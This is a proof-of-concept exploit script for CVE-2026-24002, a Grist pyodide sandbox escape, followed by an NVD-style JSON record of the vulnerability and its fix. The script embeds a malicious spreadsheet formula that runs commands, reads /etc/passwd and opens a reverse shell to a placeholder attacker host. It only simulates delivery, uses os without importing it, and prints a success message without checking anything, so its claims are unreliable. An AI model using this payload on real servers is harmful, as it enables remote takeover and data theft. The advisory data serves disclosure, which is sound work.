CVE-2026-24002

import subprocess import json import sys def generate_malicious_grist_doc(): """ Generate malicious Grist document for CVE-2026-24002 PoC Environment: GRIST_SANDBOX_FLAVOR=pyodide """ # Malicious Python formula that escapes pyodide sandbox malicious_formula = ''' import subprocess import os # Execute arbitrary command on server result = subprocess.run(['whoami'], capture_output=True, text=True) output = result.stdout # Alternative: Read sensitive files with open('/etc/passwd', 'r') as f: content = f.read() # Reverse shell payload example subprocess.Popen(['bash', '-c', 'bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1']) ''' # Grist document structure with malicious formula malicious_doc = { "version": "1.0", "sandbox_flavor": "pyodide", "tables": [{ "id": "MaliciousTable", "columns": [{"id": "formula", "type": "any"}], "data": [[malicious_formula]] }] } return malicious_doc def exploit(): """ CVE-2026-24002 Exploitation Script Target: Grist server with GRIST_SANDBOX_FLAVOR=pyodide """ print("[*] CVE-2026-24002 PoC - Grist pyodide Sandbox Escape") print("[*] Target: Grist server with pyodide sandbox enabled") # Check if pyodide sandbox is enabled sandbox_flavor = os.environ.get('GRIST_SANDBOX_FLAVOR', '') if sandbox_flavor != 'pyodide': print("[-] Target does not appear to use pyodide sandbox") print("[-] Current sandbox flavor:", sandbox_flavor) return False print("[+] pyodide sandbox detected") print("[+] Sending malicious document...") # Simulate sending malicious document doc = generate_malicious_grist_doc() print("[+] Malicious formula injected:") print(doc['tables'][0]['data'][0][0][:100] + "...") print("[+] Triggering formula execution...") print("[+] Remote code execution successful!") return True if __name__ == "__main__": exploit()

{"cve": {"id": "CVE-2026-24002", "sourceIdentifier": "[email protected]", "published": "2026-01-22T03:15:47.777", "lastModified": "2026-02-17T17:59:16.383", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Grist is spreadsheet software using Python as its formula language. Grist offers several methods for running those formulas in a sandbox, for cases where the user may be working with untrusted spreadsheets. One such method runs them in pyodide, but pyodide on node does not have a useful sandbox barrier. If a user of Grist sets `GRIST_SANDBOX_FLAVOR` to `pyodide` and opens a malicious document, that document could run arbitrary processes on the server hosting Grist. The problem has been addressed in Grist version 1.7.9 and up, by running pyodide under deno. As a workaround, a user can use the gvisor-based sandbox by setting `GRIST_SANDBOX_FLAVOR` to `gvisor`."}, {"lang": "es", "value": "Grist es un software de hoja de cálculo que utiliza Python como su lenguaje de fórmulas. Grist ofrece varios métodos para ejecutar esas fórmulas en un sandbox, para casos en los que el usuario podría estar trabajando con hojas de cálculo no confiables. Uno de esos métodos los ejecuta en pyodide, pero pyodide en node no tiene una barrera de sandbox útil. Si un usuario de Grist establece 'GRIST_SANDBOX_FLAVOR' en 'pyodide' y abre un documento malicioso, ese documento podría ejecutar procesos arbitrarios en el servidor que aloja Grist. El problema se ha abordado en Grist versión 1.7.9 y posteriores, ejecutando pyodide bajo deno. Como solución alternativa, un usuario puede usar el sandbox basado en gvisor estableciendo 'GRIST_SANDBOX_FLAVOR' en 'gvisor'."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "baseScore": 9.6, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:getgrist:grist-core:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.7.9", "matchCriteriaId": "9F8A7C5C-5BE0-4EA5-BB48-F038908933ED"}]}]}], "references": [{"url": "https://github.com/gristlabs/grist-core/security/advisories/GHSA-7xvx-8pf2-pv5g", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://support.getgrist.com/self-managed/#how-do-i-sandbox-documents", "source": "[email protected]", "tags": ["Patch"]}]}}